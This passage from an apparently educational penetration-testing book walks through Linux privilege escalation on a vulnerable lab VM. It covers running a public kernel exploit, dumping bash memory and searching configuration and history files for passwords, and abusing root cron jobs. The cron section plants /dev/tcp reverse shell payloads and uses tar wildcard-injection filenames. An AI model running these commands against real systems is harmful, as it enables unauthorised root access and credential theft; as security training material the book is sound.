It is always recommended to use the first exploit's output with the enumeration tools and scripts. In this case, we will start with the CVE-2016-4557 kernel exploit. We will need to determine more information about the exploit and how it should be used. We can do this by performing a quick Google search, as highlighted in the following screenshot:

Figure 10.17 – CVE-2016-4557 Google search

The preceding Google search reveals an exploit-db reference that contains information regarding the exploit, the exploit's source code, and how it should be used.

It is always recommended to analyze the source code to ensure that it is not malicious and works as intended. This allows you to make any additional modifications that are required.

Alternatively, we can also use the exploit-db command-line utility to query for specific vulnerabilities. This can be done by running the following command in the Kali VM:

searchsploit linux kernel 4.4

In this case, we are querying the exploit-db database for exploits specific to Linux kernel version 4.4.0. As highlighted in the following screenshot, we can identify the same exploit:

Figure 10.18 – Searchsploit results

Now that we have identified a potential kernel exploit, we can start transferring the exploit to the target and execute it.

Running the kernel exploit

Closer analysis of the kernel exploit reveals its functionality and any compilation instructions (if needed), as highlighted in the following screenshot:

Figure 10.19 – Exploit instructions

In this particular case, we need to download the ZIP file that contains the compilation script and the exploit binary to the target. After doing this, we will need to run the doubleput binary to elevate our session.

More information regarding this exploit can be found here: https://www.exploit-db.com/exploits/39772.

We can run the kernel exploit by following these steps:

The first step in this process involves downloading the exploit archive to your Kali VM. This can be done by running the following command:

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip

After downloading the exploit archive, we will need to transfer it to the target system. This can be done by starting a local web server on the Kali VM with the SimpleHTTPServer Python module:

sudo python -m SimpleHTTPServer 80

To download the binary onto the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as we have done in earlier sections.
We can now use the wget utility to download the exploit archive from the Kali VM to our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/39772.zip

After transferring the exploit archive to the target, we need to extract the archive. This can be done by running the following command:

unzip 39772.zip

After extracting the exploit archive, you will have a directory named 39772. Navigating into this directory reveals the following files:

Figure 10.20 – Exploit archive contents

Now, we need to extract the exploit.tar archive. This can be done by running the following command:

tar xf exploit.tar

After extracting the exploit.tar archive, you will be presented with a directory, as highlighted in the following screenshot:

Figure 10.21 – Exploit directory

Navigating to this directory reveals the compilation script that will generate the exploit binary when executed.

We can run the exploit compilation script by running the following command:

./compile.sh

The exploit script will generate an exploit binary named doubleput, as highlighted in the following screenshot:

Figure 10.22 – Exploit binary

As per the exploit execution instructions, we can run the doubleput binary to obtain an elevated session. This can be done by running the following command:

./doubleput

If the exploit binary runs successfully, you should receive an elevated session with root privileges, as highlighted in the following screenshot:

Figure 10.23 – Successful manual kernel exploit

With that, we have been able to successfully elevate our privileges on the target Linux VM by leveraging vulnerabilities in the Linux kernel. Now, we can begin exploring other Linux privilege escalation vectors.

Summary

In this chapter, we started by identifying and running kernel exploits automatically with the Metasploit framework. We then looked at how to identify and transfer kernel exploits manually. We ended this chapter by taking a look at how to execute kernel exploits on the target system successfully to elevate our privileges.

Now that we have learned how to perform kernel exploitation on Linux systems, we can begin exploring other Linux privilege escalation vectors.

In the next chapter, we will explore the process of mining and searching for locally stored passwords on Linux and how this can lead to successful privilege escalation.

===== FILE 18/21: B17389_11_Final_PG_ePub.xhtml =====

Chapter 11: Linux Password Mining

Now that you have an understanding of how to utilize kernel exploits on Linux in order to elevate your privileges, we can begin exploring the process of searching for and identifying locally stored credentials on Linux systems. This process will involve searching for specific passwords and application credentials that can be used to elevate our privileges directly, without the use of any exploits.

This chapter will focus on the various tools and techniques that can be used to find and identify passwords that can consequently provide us with an elevated session.

We will start off by taking a look at how to extract passwords and credentials stored in memory, after which we will take a look at how to identify credentials in application and operating system configuration files. We will then conclude the chapter by exploring the process of searching and identifying passwords logged in history files.

In this chapter, we're going to cover the following main topics:

What is password mining?
Extracting passwords from memory
Searching for passwords in configuration files
Searching for passwords in history files
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you have familiarity with Linux Terminal commands.

You can view this chapter's code in action here: https://bit.ly/2Y3qA3w

What is password mining?

You should already be familiar with the password mining process and its importance as we covered this in Chapter 7, Windows Password Mining; however, there are a few nuances in the process when dealing with Linux systems.

Password mining is the process of searching for and enumerating encrypted or clear-text passwords stored in persistent or volatile memory on the target system. The primary objective of this process revolves around identifying potentially useful user account and application passwords that can expand our authority over a target system and potentially provide us with elevated privileges.

Given the nature of Linux distributions and deployment use cases, this process will differ from target to target. It is therefore important to have a good understanding of how and where passwords, both encrypted and clear-text, are stored on Linux systems.

It is also important to understand that this process relies on a series of vulnerabilities that are a result of an organization's or individual's password security practices. Poor password security practices are the primary target for attackers as they provide a straightforward access vector without the need for further system exploitation or compromise.

Because of the numerous amounts of credentials that are required by various platforms and applications, employees and individuals are prone to saving their credentials on their systems in cleartext, usually in .doc, .txt, or .xlsx files for ease of access, and are most likely to use weaker passwords comprised of events, names, or dates that are relevant to them. This is a significant threat to the security of an organization and as a result, most organizations enforce a password security policy as a means of remediating these issues. Password security policies are used to establish a baseline security level for user account passwords and enforce the secure storage and use of stronger passwords comprised of words (both uppercase and lowercase), symbols, and numbers with a recommended minimum length of eight digits. However, this gives rise to the occurrence of password reuse, where employees and individuals are likely to reuse the same password for multiple accounts, primarily because of the complex nature of the passwords they are required to use. This allows attackers to gain access to multiple accounts by compromising a single account password.

An additional security vulnerability or risk involves Linux user account passwords and how they are stored. Linux encrypts and stores user account passwords locally. After initial access has been obtained by an attacker, user account hashes can be dumped from memory and can be cracked depending on the length and strength of the password. We will explore the advantages and drawbacks of this technique later in this chapter.

From an organizational standpoint, Linux is also used to host third-party business-critical applications that come with their own security vulnerabilities. Most of these applications implement some form of access control and consequently require user authentication in the form of a username and password combination. These applications are also prone to storing credentials locally in either clear-text or in an encrypted format. After successful exploitation, attackers can locate these credentials, decrypt them (if weak), and use them to gain access to the application and consequently expand their domain of control over a system or network.

Now that you have an understanding of what password mining is, we can take a look at how to set up our target virtual machine (VM) that we will use for the remainder of the chapters in this book.

Setting up our environment

In this chapter, we will be utilizing a customized Debian 6 VM that has been configured to be vulnerable and that will provide us with a robust environment to learn and demonstrate the password mining process.

To begin setting up the VM, follow the procedures outlined next:

The first step in the process involves downloading the VM Open Virtualization Appliance (OVA) file required to set up the target system with VirtualBox. The OVA file can be downloaded from the following link: https://www.dropbox.com/s/e8anrvbxvqidw3w/Debian%206%2064-bit%20%28Workshop%29.ova?dl=0.
In order to import the VM into VirtualBox, you will need to double-click the Debian 6 64-bit (Workshop) file, as highlighted in the following screenshot:

Figure 11.1 – VM file

After double-clicking on the OVA file, you will be prompted with the VirtualBox import wizard, as highlighted in the following screenshot:

Figure 11.2 – VirtualBox import wizard

The VirtualBox import wizard will prompt you to specify the VM base folder, as highlighted in the preceding screenshot. After this, you can click on the Import button to begin the import process.

After the VM has been imported into VirtualBox, you will need to add it to the Virtual Hacking Lab network we created in Chapter 2 of this book, Setting Up Our Lab, as highlighted in the following screenshot:

Figure 11.3 – VirtualBox network settings

Once you have configured the VM to use the custom network, you can save the changes and boot up the VM to get started.

You will require an initial foothold on the system in order to follow along with the techniques and demonstrations in this chapter. You can gain an initial foothold on the system by remotely authenticating to the target via Secure Shell (SSH) with the following credentials: username (user) and password (password321).

These credentials will provide you with an unprivileged session on the target system that we can use as a starting point to elevate our privileges.

Extracting passwords from memory

We can begin the password mining process by exploring an uncommon technique that can be used to extract application passwords from memory. The viability and success of this technique will depend on the type of applications that are running on the target and its deployment use case.

Applications and services that utilize username and password authentication may store credentials in user-space memory, either in cleartext or in an encrypted state. Dumping and analyzing the memory of a particular service may reveal credentials pertinent to the application. We can use these credentials to gain access and take control of the particular service; alternatively, we can use the discovered credentials for authentication to other user accounts in order to elevate our privileges. This is because many users and system administrators are prone to reusing passwords for various applications and their user accounts.

We can use the GNU Debugger (GDB) to dump the memory of a running service or application in order to reveal clear-text or encrypted passwords.

Note

GDB is a portable debugger that runs on various Unix-like systems and can be used to debug various programming languages.

This technique requires a procedural approach and will vary from system to system based on the types of applications that are running on the target.

We can begin the process by following the procedures outlined next:

The first step in the process involves identifying services running on the target system that utilize authentication or services that may have been used to authenticate with other services. This can be done by running the following command on the target system:

ps -ef

This command will outline a list of all running services on the system and their corresponding process identifier (PID).

As highlighted in the following screenshot, we are able to identify various services running as user:

Figure 11.4 – Bash process

We can also manually search for specific services that are likely to utilize authentication. This can be done by running the following command:

ps -ef | grep <SERVICE_NAME>

This command utilizes the grep utility to limit the results to the processes that match the keyword.

As highlighted in Figure 11.4, we are able to identify a Bash session and its corresponding PID.

We can utilize GDB to dump the memory of the Bash service in order to reveal credentials that may have been entered in the Bash session earlier on by other users. This can be done by running the following command on the target system:

gdb -p <PID>

This command is used to specify the specific PID that you want to analyze with GDB. In this case, ensure that you specify the PID for the Bash service, as highlighted in Figure 11.4.

The next step involves listing all mapped memory regions for the process. This can be done by running the following command in the GDB:

info proc mappings

If successful, the GDB should output the mapped address spaces for the service, as highlighted in the following screenshot:

Figure 11.5 – GDB mapped address spaces

Take note of the start and end addresses for the heap, as highlighted in the preceding screenshot, as we will need these addresses in order to dump the memory of the service.

We can now dump the memory of the service by specifying the start and end addresses of the heap allocation. This can be done by running the following command in the GDB:

dump memory <OUTPUT_FILE> <START_ADDRESS> <STOP_ADDRESS>

This command will output the contents of the heap memory for the Bash service into an output file that we can analyze.

Note

Heap memory, also known as dynamic memory, is used by applications to store global variables.

After dumping the memory of the Bash service into a file, we can utilize the strings utility to identify potentially useful information and credentials. This can be done by running the following command on the target system:

strings /<OUTPUT_FILE> | grep passw

This command will identify all strings in the output file and search for any occurrences of the passw keyword.

As highlighted in the following screenshot, we are able to identify an authentication command to MySQL with the username and password specified in cleartext:

Figure 11.6 – MySQL credentials dumped from memory

We can now use these credentials to gain root access to the MySQL server, as the credentials specified in the authentication command use the root account. However, the target isn't running a MySQL server.

Alternatively, we can utilize the MySQL credentials to try to gain access to the root account on the target system via SSH in the event the root user has reused their password for other services. This can be done by running the following command:

ssh root@<TARGET-IP>

As highlighted in the following screenshot, authentication with the MySQL credentials is successful, and you should now have root access to the target system:

Figure 11.7 – Successful SSH authentication

We have now been able to successfully elevate our privileges by dumping and analyzing the memory of a specific service. In this case, we were able to get access to the root account on the system primarily because of poor security practices by the administrator or root user. The following mistakes or poor security practices led to the successful elevation of our privileges:

Password reuse by the administrator or root user.
The MySQL authentication command included the username and the password.

These mistakes are commonly made by users and system administrators on Linux servers and should always be tested as they can reveal very important information that can be used to elevate your privileges on the target system.

Now that you have an understanding of how to dump the memory of processes and how to search for and identify credentials, we can begin exploring the process of searching for passwords in configuration files.

Searching for passwords in configuration files

An application provides an enticing target for attackers as weaknesses and vulnerabilities in it and its storage of credentials can lead to complete system compromise or elevated privileges.

This section will be focused on finding and enumerating application credentials. The techniques demonstrated in this section will depend on the type of target you are dealing with and its deployment use case. In our particular case, our target VM is set up to be a server and has various applications installed.

The first step of this process involves searching for passwords in various files stored locally; this will allow us to identify any user or application passwords in text or configuration files. This can be achieved through the use of inbuilt Linux utilities that allows us to search for specific strings in files with specific extensions.

Searching for passwords

We can get started with the password searching process by following the procedures outlined next:

We can start off by searching for files that contain passwords. This can be done by leveraging the grep utility, as follows:

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

This command will perform a recursive scan from the root of the filesystem and will output a list of files that contain the password keyword and will color code the results accordingly, as illustrated in the following screenshot:

Figure 11.8 – grep results

Note

It is recommended to alternate between the use of the password keyword and abbreviated variations of the keyword, such as pass or passw. This is because configuration files will store credentials under different names and may use abbreviated versions of the keyword.

The command will output quite a bit of data, which can make it difficult to identify any potentially useful credentials. As a result, we will need to narrow down our search to specific directories that contain useful configuration files for applications and services. This can be done by running the following command:

grep --color=auto -rnw '/etc' -ie "PASSWORD" --color=always 2> /dev/null

This command will limit the results to the configuration files found in the /etc directory, as highlighted in the following screenshot:

Figure 11.9 – Customized grep search results

In this case, we weren't able to identify any useful credentials, so we can turn our attention to the user home directory.

We can customize the search keyword in order to ensure that we do not miss any matches for the keyword by utilizing the pass keyword instead of password. This can be done by running the following command:

grep --color=auto -rnw '/home/user' -ie "PASS" --color=always 2> /dev/null

This command will output a list of all files in the user account home directory with the pass keyword, as highlighted in the following screenshot:

Figure 11.10 – Customized grep search results

In this case, we are able to identify an OpenVPN configuration file in the user account home directory that contains the location of the OpenVPN credentials. We can display the contents of the file highlighted in the preceding screenshot by running the following command:

cat /etc/openvpn/auth.txt

The output of this command is shown here:

Figure 11.11 – OpenVPN credentials

Displaying the contents of the file reveals the credentials for the user account but does not reveal the credentials for any other account on the system, as highlighted in the preceding screenshot.

If we did not know the credentials for the user account beforehand, this would be useful information as we would have obtained the password for the user account without cracking the password hash for this account.

You can also utilize the find utility in conjunction with the grep utility in order to fine-tune your searches based on the configuration of your target. This can be done by running the following command:

find /etc -type f -exec grep -i -I "PASS" {} /dev/null \;

This command will output a list of files in the /etc directory that contain the pass keyword.

In this case, we are not able to find any new files that contain credentials that we can use, as highlighted in the following screenshot:

Figure 11.12 – find search results

We can also search for files that contain the pass keyword in the user account home directory by running the following command:

find /home/user -type f -exec grep -i -I "PASS" {} /dev/null \;

The output is shown here:

Figure 11.13 – Custom find search results

In this case, we are able to identify an Internet Relay Chat (IRC) client configuration file that contains the user account IRC credentials; however, we are not able to locate any other user or application credentials that can be used for privilege escalation.

We can automate this process through the use of an automated enumeration script. In this case, we will utilize Linux Privilege Escalation Awesome Script (linPEAS) to automate the password mining process on our target.

Note

linPEAS is a local Linux enumeration script that searches and scans for potential vulnerabilities and enumerates all important system information that can be used to stage a privilege escalation attack.

The linPEAS binary can be downloaded from the GitHub repository here:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Ensure you download the linpeas Bash script, as highlighted in the following screenshot:

Figure 11.14 – linPEAS Bash script

After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target VM. This cannot be done automatically as we do not have a meterpreter session. As a result, we will need to make use of Linux-specific utilities to download the binary.

Transferring files

In order to transfer the linpeas.sh file to our target, we will need to set up a web server on our Kali VM that will be used to host the file so that we can download it on the target system. This can be done by following the procedures outlined here:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the linpeas.sh binary is stored:

sudo python -m SimpleHTTPServer 80

Note

SimpleHTTPServer is a Python module for Python 2 and is also available for Python 3 under the name http.server.

As highlighted in the following screenshot, the SimpleHTTPServer module will serve the files in the directory on the Kali VM Internet Protocol (IP) address on port 80:

Figure 11.15 – SimpleHTTPServer linPEAS

In order to download the linpeas.sh file on to the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:

Figure 11.16 – Linux temporary directory

We can now use the wget utility to download the file from the Kali VM to our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/linpeas.sh

The output of this command is shown here:

Figure 11.17 – Transferring the linPEAS script

As shown in the preceding screenshot, if the transfer is successful, the linpeas.sh file should be downloaded and saved with the name we specified.

We can now use the linpeas.sh script to automate the password mining process. This can be done by running the linpeas.sh script. However, before we do that, we need to ensure the script has executable permissions. This can be done by running the following command on the target:

chmod +x linpeas.sh

We can now run the linpeas.sh script by running the following command on the target:

./linpeas.sh

This command will enumerate and output all relevant system information pertinent to privilege escalation. In this case, we are only interested in the files that contain credentials.

In this case, we are able to identify the IRC client credentials we found earlier with manual techniques, as highlighted in the following screenshot:

Figure 11.18 – IRC client password

We were also able to identify the OpenVPN user credentials, as highlighted in the following screenshot:

Figure 11.19 – OpenVPN credentials

The linpeas.sh script does not reveal any other credentials or passwords stored locally on the system. As a result, we will have to narrow down our search to specific files that are likely to contain potentially useful information.

Our search for passwords and credentials has not been fruitful as we were not able to locate any credentials that would allow us to elevate our privileges further. However, we were only able to find the user account credentials.

The next step in the process will involve searching for passwords in history files on the target system.

Searching for passwords in history files

One of the advantages of running Linux is the extensive amount of logging that is afforded to a user. By default, Linux will automatically log all Bash commands entered on a system by a user unless specified otherwise. This is an advantage for system administrators as it provides a system of accountability whereby all user actions and commands are logged and can be analyzed historically; however, if not configured correctly, attackers can leverage this functionality to search for and identify important information such as credentials from various history files that log the commands entered by a user.

Companies and organizations mitigate this inherent configuration vulnerability by disabling the user command history from being logged. Alternatively, they can also enforce the deletion of these logs once a user has completed a session. However, in many cases, users on a Linux system may forget to clear their history, and as a result, attackers can sift through the user's history with the objective of locating potentially useful information.

The steps for searching and identifying locally stored credentials through various techniques are as follows:

The first step in this process involves analyzing the user account Bash history file. The bash_history file logs all commands input by a user in a Bash session and is located by default in the user's home directory. We can utilize the cat utility in conjunction with the grep utility to display the contents of the file and limit the output to only display commands that match a keyword. This can be done by running the following command:

cat /home/user/.bash_history | grep "pass"

This command will output a list of commands entered by a user in the past that contain the pass keyword, with the aim of identifying any credentials that may have been entered, as illustrated in the following screenshot:

Figure 11.20 – Analyzing Bash history

As highlighted in the preceding screenshot, we are able to identify an authentication command to a local MySQL server that contains the username and password specified in cleartext.

Note

The bash_history file is used to store the command history of a particular user. The bash_history file can be configured in the .bashrc configuration file that is stored in the home directory of a user.

We can utilize these credentials for authentication with the MySQL server; however, the server doesn't seem to be running a MySQL server at this point in its operation. However, we can also utilize these credentials to authenticate to the root account in the event of password reuse.

This can be done by switching to the root user from our current user and specifying the credentials we identified in the preceding screenshot, as follows:

su root

As highlighted in the following screenshot, authentication with the MySQL credentials was successful, and we have successfully elevated our privileges to the highest level on the target system:

Figure 11.21 – Successful privilege escalation

Alternatively, we can also use the history command on the target system to output the entire history of commands that have been previously entered by a user. This can be done by running the following command:

history

As highlighted in the following screenshot, we are able to identify an authentication attempt to a MySQL server with the credentials specified in cleartext. We are also able to identify potentially interesting files that could contain information that could be useful in elevating our privileges on the target system, as shown in the following screenshot:

Figure 11.22 – Analyzing command history

In this case, we can utilize the MySQL credentials to elevate our privileges to the highest level as the root user, as we have done previously.

We have been able to successfully elevate our privileges by searching for and identifying locally stored credentials through various techniques.

Summary

In this chapter, we got started by taking a look at how to extract application passwords from memory with the GDB. We then took an in-depth look at how to search for and identify passwords in configuration files, both manually and automatically. We finally ended the chapter by taking a look at how to locate passwords from the bash_history file of a particular user.

Now that we have learned how to elevate our privileges by finding locally stored passwords on Linux systems, we can begin exploring other Linux privilege escalation vectors.

In the next chapter, we will explore the process of elevating our privileges through misconfigured scheduled tasks.

===== FILE 19/21: B17389_12_Final_PG_ePub.xhtml =====

Chapter 12: Scheduled Tasks

One of the most important privilege escalation vectors on Linux is exploiting misconfigured scheduled tasks, also known as cron jobs. This chapter will focus on the process of enumerating the scheduled tasks running on the target system, analyzing them for misconfigurations, and exploiting them to elevate our privileges.

We will start this chapter by looking at how Linux implements scheduled tasks with cron, after which we will take a look at how to escalate our privileges through cron paths. We will then take a look at how to exploit cron wildcards to elevate our privileges, before exploring the process of escalating our privileges via cron file overwrites.

In this chapter, we're going to cover the following main topics:

Introduction to cron jobs
Escalation via cron paths
Escalation via cron wildcards
Escalation via cron file overwrites
Technical requirements

To follow along with the demonstrations in this chapter, you will need to ensure that you have familiarity with Linux Terminal commands.

You can view this chapter's code in action here: https://bit.ly/3F3747S

Introduction to cron jobs

The ability to schedule tasks on an operating system is a vitally important feature that can improve the efficiency of the tasks being performed on the system and, consequently, the efficiency of the individuals responsible for managing and maintaining the system. This functionality may not be fully realized or appreciated in desktop operating systems that are typically geared toward regular end users, but in the case of Linux, where it is mostly deployed as a server operating system, the ability to automate and schedule certain repetitive tasks such as system backups is greatly appreciated and is widely implemented by system administrators and engineers.

Linux implements task scheduling through a utility called cron. Cron is a time-based service that runs applications, scripts, and other commands repeatedly on a specified schedule.

An application or script that has been configured to be run repeatedly with cron is known as a cron job. Cron can be used to automate or repeat a wide variety of functions on a system, from daily backups to system upgrades and patches.

Cron allows you to run a program, script, or command periodically at whatever time you choose. These cron jobs are then stored in the crontab file.

The crontab file is a configuration file that is used by the cron utility to store and track cron jobs that have been created.

Now that you have an understanding of what cron is and what it does, let's take a look at how cron jobs are stored in the crontab file.

The crontab file

You can list the cron jobs running on a system by running the following command on the target system:

crontab

Alternatively, if the user you are currently logged in as doesn't have the necessary permissions to utilize the crontab command, you can also manually display the contents of the crontab file by running the following command:

cat /etc/crontab

As shown in the following screenshot, this will output a list of all active cron jobs, as well as their respective schedules, applications, scripts, or commands they have been configured to run:

Figure 12.1 – Contents of the crontab file

To understand how we can exploit cron jobs to elevate our privileges, we need to have an understanding of how the crontab file is structured and how the schedules for the cron jobs are configured.

This can be achieved through a simple example. The crontab entry highlighted in the following screenshot schedules the command to be run at the 17th minute of every hour, repeatedly:

Figure 12.2 – Example of a cron job

The first five fields at the beginning of the cron job entry are used to specify the scheduled time. These fields are used to specify the following values:

Minute (0 – 59): Used to specify the minute the cron job should be run.
Hour (0 – 23): Used to specify the hour of the day the cron job should be run.
Day of the month (1 – 31): Used to specify the specific day of the month the cron job should be run.
Month (1 – 12): Used to specify the month when the cron job should be run.
Day of the week (0 – 7): Used to specify the day of the week when the cron job should be run.

As you may have noticed, some fields have an asterisk (*) as a value, which means that the cron job will run on all of the hours, days, weeks, and months unless specified otherwise. In this case, the cron job will run at the 17th minute of every hour, day, month, and day of the week:

Figure 12.3 – Cron job syntax

The preceding screenshot outlines the syntax of a cron job and the various fields that can be customized to configure the schedule for the cron job.

Cron jobs can also be run as any user on the system. This is a very important factor to keep an eye on as we will be targeting cron jobs that have been configured to be run as the root user. This is primarily because any script or command that is run by a cron job will run as the root user and, consequently, provide us with root access.

Now that you have an understanding of how cron jobs work and how they are configured, we can begin the process of analyzing them for misconfigurations to elevate our privileges.

In this chapter, we will be utilizing the virtual machine we set up in Chapter 11, Linux Password Mining. This is because the virtual machine has been configured to be vulnerable and has various cron jobs that can be used to demonstrate various privilege escalation techniques.

Escalation via cron paths

The first privilege escalation technique we will be exploring is the process of exploiting poorly configured cron paths. However, before we can begin this process, let's take a quick look at the various ways of accessing the crontab file on the target system.

The reason we need to do this is because we will come across systems that have been configured differently and can access the crontab file, so enumerating cron jobs running on a system is vitally important in the privilege escalation process.

As demonstrated in the previous section, you can access the crontab file on the target system by running the following command:

crontab

This command may not yield any results if access to the utility has been limited by the administrator. However, you can use the following commands to enumerate information regarding the active cron jobs on the system:

crontab -l

ls -alh /var/spool/cron;

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny*

Accessing the files and directories listed here should yield information regarding the active cron jobs on the system.

Enumeration with linPEAS

We can also enumerate the various cron jobs running on a system with automated tools. This can be done by using linux-exploit-suggester or other enumeration scripts and tools. In this case, we will utilize the linPEAS script to enumerate information from our target.

Note

linPEAS is a local Linux enumeration script that searches and scans for potential vulnerabilities, and also enumerates all important system information that can be used to stage a privilege escalation attack.

The linPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS.

Ensure you download the linpeas.sh Bash script, as highlighted in the following screenshot:

Figure 12.4 – linPEAS Bash script

After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target virtual machine. This cannot be done automatically as we do not have a Meterpreter session. As a result, we will need to make use of Linux-specific utilities to download the binary.

Transferring files

To transfer the linpeas.sh file to our target, we will need to set up a web server on our Kali VM that will be used to host the file. This will allow us to download it on the target system. This can be done by following these steps:

To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the linpeas.sh binary is stored:

sudo python -m SimpleHTTPServer 80

Note

SimpleHTTPServer is a Python module for Python 2 that is also available for Python 3 as http.server.

As highlighted in the following screenshot, the SimpleHTTPServer module will serve the files in the directory on the Kali VM IP address on port 80:

Figure 12.5 – SimpleHTTPServer linpeas

To download the linpeas.sh file on the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:

Figure 12.6 – Linux temporary directory

We can now use the wget utility to download the file from the Kali VM to our target system. This can be done by running the following command on the target system:

wget http://<KALI-VM-IP>/linpeas.sh

The output is shown in the following screenshot:

Figure 12.7 – wget linPEAS

As shown in the preceding screenshot, if the transfer is successful, the linpeas.sh file should be downloaded and saved with the name we specified.

We can now use the linpeas.sh script to enumerate the various cron jobs running on the target system.

Finding cron jobs with linPEAS

The linpeas.sh script enumerates a lot of information and will perform various checks to discover potential vulnerabilities on the target system. We can use the linpeas.sh script to enumerate and locate the cron jobs running on the system. This can be done by following these steps:

To enumerate all the important system information, we need to run the linpeas.sh script. However, before we do that, we need to ensure the script has executable permissions. This can be done by running the following command in the target:

chmod +x linpeas.sh

Alternatively, you can modify the permissions of the linpeas.sh script by running the following command:

chmod 775 linpeas.sh

We can now run the linpeas.sh script by running the following command on the target:

bash linpeas.sh

As shown in the following screenshot, the script will enumerate system information and display a list of cron jobs running on the system, as well as the default $PATH variable:

Figure 12.8 – linPEAS cron jobs

In this case, our target is running two cron jobs as the root user that have been configured to run every 1 minute. We can use this information to identify specific misconfigurations in the scripts and commands that are executed by the cron jobs.

Now that we have been able to enumerate the various cron jobs running on the target system, we can begin the privilege escalation process.

Escalating privileges via cron paths

This particular privilege escalation technique involves identifying the default $PATH variable that's been configured for cron jobs in the crontab file, generating a payload, and placing it in the path:

Figure 12.9 – The PATH variable

Note

The $PATH variable is used to set the default path that the cron jobs will run from, unless specified otherwise.

As highlighted in the preceding screenshot, the $PATH variable has been set as the home directory of the user account. This means that, by default, all the cron jobs will run from the user account's home directory, unless specified otherwise.

This can be construed as a misconfiguration as the user account can access files and scripts that are used by the cron jobs. We can exploit this misconfiguration by identifying cron jobs that utilize scripts or binaries that are stored in the user account's home directory.

Analyzing the crontab file reveals an interesting cron job that runs a Bash script named overwrite.sh as the root user:

Figure 12.10 – Overwrite cron job

As highlighted in the preceding screenshot, the cron job has also been configured to run every 1 minute of every hour, every day, and every month.

Now that we have identified a potential cron job that has the necessary requirements, we can begin the privilege escalation process:

The first step in this process involves locating and identifying the location of the overwrite.sh script that is run by the cron job. We were able to determine the default path used by the cron job is the user account's home directory. We can display the contents of the directory by running the following command:

ls -al /home/user/

The output is as follows:

Figure 12.11 – The user home directory

As illustrated in the preceding screenshot, we are unable to locate the overwrite.sh script in the user home directory. This could be because the root user has not created the script yet. In any event, we can create the script ourselves and get it to provide us with a reverse shell with root privileges as the cron job will execute the script as the root user.

We can create the overwrite.sh script and insert a Bash command that will provide us with a reverse shell. This can be done by running the following command in the user home directory:

echo "bash -i >& /dev/tcp/<KALI-IP>/<PORT> 0>&1" > overwrite.sh

This command will add a bash command that will connect to our reverse listener on the Kali Linux VM. Ensure that you replace the fields in the command with the respective IP address and port number.

After running the preceding command, the overwrite.sh file should have been created, and it should contain the command outlined in the following screenshot:

Figure 12.12 – Overwrite file

Once we have created this file, we need to set up a reverse listener with Netcat.

We can set up the reverse listener on the Kali VM by running the following command:

nc -nvlp <PORT>

Ensure that you specify the port that you used in the overwrite.sh script. After setting up the listener, we will need to wait for a few minutes for the cron job to run.

Once the cron job has been invoked, the overwrite.sh script will be executed. We should get a reverse shell on our listener with root privileges, as highlighted in the following screenshot:

Figure 12.13 – Reverse shell

With that, we have successfully elevated our privileges by leveraging a misconfiguration in the crontab $PATH variable. This allowed us to execute a custom command that provided us with an elevated reverse shell on the target system.

Escalation via cron wildcards

This privilege escalation technique involves taking advantage of cron jobs that execute commands or scripts with wildcards. In the context of Linux, wildcards (*) are used to perform more than one action at a time, and they can be used in a variety of different ways. In this section, we will explore how they can be exploited to execute malicious commands or scripts if misconfigured.

Important Note

Note that the success of this technique will depend on whether or not wildcards have been utilized in cron jobs.

Follow these steps:

The first step in this process involves identifying cron jobs that run commands or scripts with wildcards. Analyzing the crontab file reveals an interesting cron job that is responsible for creating and compressing backup archives:

Figure 12.14 – Backup cron job

As highlighted in the preceding screenshot, the cron job runs the compress.sh script located under /usr/local/bin as the root user and runs every minute of every hour, every day, and every month.

We can display the content of the compress.sh script by running the following command:

cat /usr/local/bin/compress.sh

The output is as follows:

Figure 12.15 – Displaying the content of the compress.sh script

As highlighted in the preceding screenshot, we can identify that the script is executed from the user account's home directory and that the files have been compressed with the tar utility. However, we can also identify a wildcard (*) at the end of the tar command. The wildcard is used to specify all the files in the user account's home directory.

The tar utility has a checkpoint feature that is used to display progress messages after a specific set of files. It also allows users to define a specific action that is executed during the checkpoint. We can leverage this feature to execute a reverse shell payload that will provide us with an elevated session when executed.
We can create the reverse shell script and insert a bash command that will provide us with a reverse shell. This can be done by running the following command in the user home directory:

echo 'bash -i >& /dev/tcp/<KALI-IP>/<PORT> 0>&1' > shell.sh

This command will add a bash command that will connect to our reverse listener on the Kali Linux VM. Ensure that you replace the fields in the command with the respective IP address and port number.

After running the preceding command, the shell.sh file should have been created, and it should contain the command outlined in the following screenshot:

Figure 12.16 – Shell script

Now that we have created the file, we need to set up a reverse listener with Netcat.

We can set up the reverse listener on the Kali VM by running the following command:

nc -nvlp <PORT>

Ensure that you specify the port that you used in the shell.sh script.

We can now set up our tar checkpoints in the user account's home directory. This can be done by running the following command on the target system:

touch /home/user/--checkpoint=1

After setting up our checkpoint, we need to set up our checkpoint action. In this case, our checkpoint action will execute the shell.sh script, which will provide us with an elevated reverse shell. This can be done by running the following command:

touch /home/user/--checkpoint-action=exec=sh\ shell.sh

After setting up the tar checkpoint and checkpoint action, we need to wait a few minutes for the cron job to be invoked, after which we should receive an elevated reverse shell on our Netcat listener, as highlighted in the following screenshot:

Figure 12.17 – Reverse shell

With that, we have successfully elevated our privileges by exploiting cron jobs that implement the improper use of wildcards to execute a reverse shell payload as the root user.

Now, let's take a look at how to elevate our privileges through cron file overwrites.

